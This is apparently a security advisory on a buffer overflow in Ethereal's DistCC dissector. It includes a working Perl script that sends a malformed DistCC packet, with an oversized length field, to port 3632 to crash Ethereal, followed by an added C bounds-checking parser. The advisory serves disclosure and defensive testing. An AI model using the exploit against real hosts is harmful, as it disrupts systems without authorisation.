Ethereal DistCC Buffer Overflow (Exploit)

Summary

As we reported in our previous article, Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal's DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer that Ethereal uses when it handles DistCC-related packets. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:

The information has been provided by beSTORM.


Details

Vulnerable Systems:
 * Ethereal version 0.10.10 and prior

Immune Systems:
 * Ethereal version 0.10.11 or newer

Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;

if (!$target)
{
 usage();

 print "No target has been supplied, reverting to 192.168.1.52.\n";
 $target = "192.168.1.52";
}

print "Will attack $target.\n";
my $target_port = 3632;

my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()\n{\n return(0);\n}\n
END

print "Sending: [$packet]\n";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "3632");

unless ($remote) { die "cannot connect to distcc daemon on $target" }

print $remote $packet;

print "Done.\n";

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print ("#"x50);
 print "\n";
 print "# $0 [hostname]\n";
 print "# hostname\t-\tThe host the packet will be sent to.\n";
 print "\n";
}
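
The following is an added example, not part of the original advisory and not Ethereal's code: a bounds-checked walk over the DistCC token stream seen in the packet above, which rejects a declared length such as the FFFFFF00 given for the two-byte argument "cc" before anything is copied. The names ARG_BUF, read_token and distcc_check, the status codes and the 256-byte buffer size are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_BUF 256   /* assumed size of the parser's fixed argument buffer */
enum { DISTCC_OK = 0, DISTCC_BAD_LENGTH = 1, DISTCC_MALFORMED = -1 };

/* One DistCC token: 4-character name followed by 8 hex digits. */
static int read_token(const unsigned char *p, char name[5], unsigned long *param)
{
    char hex[9];
    for (int i = 4; i < 12; i++)
        if (!isxdigit(p[i])) return -1;
    memcpy(name, p, 4);    name[4] = '\0';
    memcpy(hex, p + 4, 8); hex[8] = '\0';
    *param = strtoul(hex, NULL, 16);
    return 0;
}

/* Walk a request and validate every declared length before copying. */
int distcc_check(const unsigned char *buf, size_t len)
{
    size_t off = 0;
    char name[5], arg[ARG_BUF];
    unsigned long n;
    while (len - off >= 12) {
        if (read_token(buf + off, name, &n) != 0) return DISTCC_MALFORMED;
        off += 12;
        int is_argv = strcmp(name, "ARGV") == 0;
        if (!is_argv && strcmp(name, "DOTI") != 0)
            continue;              /* DIST, ARGC: the parameter is a value */
        /* Unsigned comparison against the bytes left and the buffer size. */
        if (n > len - off || (is_argv && n >= sizeof arg))
            return DISTCC_BAD_LENGTH;
        if (is_argv) { memcpy(arg, buf + off, n); arg[n] = '\0'; }
        off += n;
    }
    return DISTCC_OK;
}

int main(void)
{
    /* Constructed samples; the second is the start of the packet above. */
    const char *ok  = "DIST00000001ARGC00000002ARGV00000002ccARGV00000002-c";
    const char *bad = "DIST00000001ARGC00000008ARGVFFFFFF00cc";
    printf("benign: %d\n", distcc_check((const unsigned char *)ok, strlen(ok)));
    printf("page:   %d\n", distcc_check((const unsigned char *)bad, strlen(bad)));
    return 0;
}
```

The length is held in an unsigned type and compared against both the bytes remaining and the destination size, so a value like FFFFFF00 cannot be read as a small or negative number.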
